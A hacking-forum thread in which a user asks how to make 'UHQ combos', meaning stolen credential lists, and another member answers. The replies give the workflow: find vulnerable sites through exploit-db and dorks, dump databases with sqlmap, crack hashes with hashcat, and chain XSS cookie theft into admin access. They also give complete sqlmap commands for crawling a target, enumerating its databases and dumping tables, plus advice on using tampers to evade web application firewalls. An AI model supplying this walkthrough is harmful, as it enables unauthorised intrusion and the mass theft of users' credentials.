This post is by a banned member (Psycopathz) - Unhide
OP 28 April, 2024 - 06:00 AM
someone tell me how to make UHQ combos either here or by discord, cxlvxn. or telegram Flez.ccp
plssssss ![[Image: 6cemrbF.gif]](https://i.imgur.com/6cemrbF.gif) Selling Signature Spot Dm me on discord cxlvxn.
This post is by a banned member (Psycopathz) - Unhide
Bumped
#2
OP 28 April, 2024 - 04:13 PM
This is a bump
This post is by a banned member (Psycopathz) - Unhide
Bumped
#3
OP 30 April, 2024 - 08:45 PM
This is a bump
This post is by a banned member (UberFuck) - Unhide
05 May, 2024 - 08:38 PM
1) Find vulnerable websites -> https://www.exploit-db.com | https://www.dorksearch.com
2) Dump databases -> https://sqlmap.org 3) Crack passwords -> https://hashcat.net There are other tools and resources, but the idea is the same: find and exploit vulnerabilities, dump creds, crack hashes. It's not always straightforward...for example you might find a XSS vulnerability that can be used to steal cookies giving you access to an admin panel, which can then be used to modify a page with a SQL injection vulnerability. Unfortunately, most skids just repost what they've found or bought somewhere else with no knowledge of how it was actually obtained.
This post is by a banned member (Psycopathz) - Unhide
OP 07 May, 2024 - 11:18 PM
(05 May, 2024 - 08:38 PM)UberFuck Wrote: Show More Hey, thanks so much for the reply! do you have any account that I could contact you by like Discord, Telegram. Selling Signature Spot Dm me on discord cxlvxn.
This post is by a banned member (Psycopathz) - Unhide
Bumped
#7
This is a bump
(07 May, 2024 - 11:27 PM)UberFuck Wrote: Show More Well I had a question about the dumper, Idk what to do there is so many settings and not much information in the website to fill what out. and there is many methods dk which 1 to do.
This post is by a banned member (UberFuck) - Unhide
08 May, 2024 - 12:28 AM
(07 May, 2024 - 11:40 PM)Psycopathz Wrote: Show More The basics... If you want to crawl a site to find a SQL injection vulnerability: sqlmap -u "https://targetsite.com/" --host "targetsite.com" --random-agent --crawl=2 --batch --forms --threads=10 --level=3 --risk=2 If you are targeting a specific parameter w/ get request: sqlmap -u "http://api.targetsite.com/endpoint?param=val" --host "targetsite.com" --random-agent -p param When the injection vulnerability is confirmed, sqlmap will create a profile for the url and injection point. Just repeat the last command and add parameters for exploring the db, then dumping. Names of available databases: sqlmap -u "http://api.targetsite.com/endpoint?param=val" --host "targetsite.com" --random-agent -p param --dbs Tables in a database: sqlmap -u "http://api.targetsite.com/endpoint?param=val" --host "targetsite.com" --random-agent -p param -D dbname --tables Dump a database table: sqlmap -u "http://api.targetsite.com/endpoint?param=val" --host "targetsite.com" --random-agent -p param -D dbname -T tablename --dump If you already know the type of database, using the dbms parameter will improve results. I generally use the dump-format parameter with SQLite as the output - commas in fields fuck with CSV output and it's much easier to explore the data at a later time with SQLite. I'd recommend keeping the sqlmap wiki page bookmarked as a reference. You'll also want to learn about and experiment with different tampers to get around WAF's - you can use more than one at a time. It takes practice to just get decent using the tool, but it does a much better job than most SQL injection scanners and dumping tools. |
| Create an account or sign in to comment | ||
| You need to be a member in order to leave a comment | ||
|
Create an account
Sign up for a new account in our community. It's easy!
|
or |
Sign in
Already have an account? Sign in here.
|
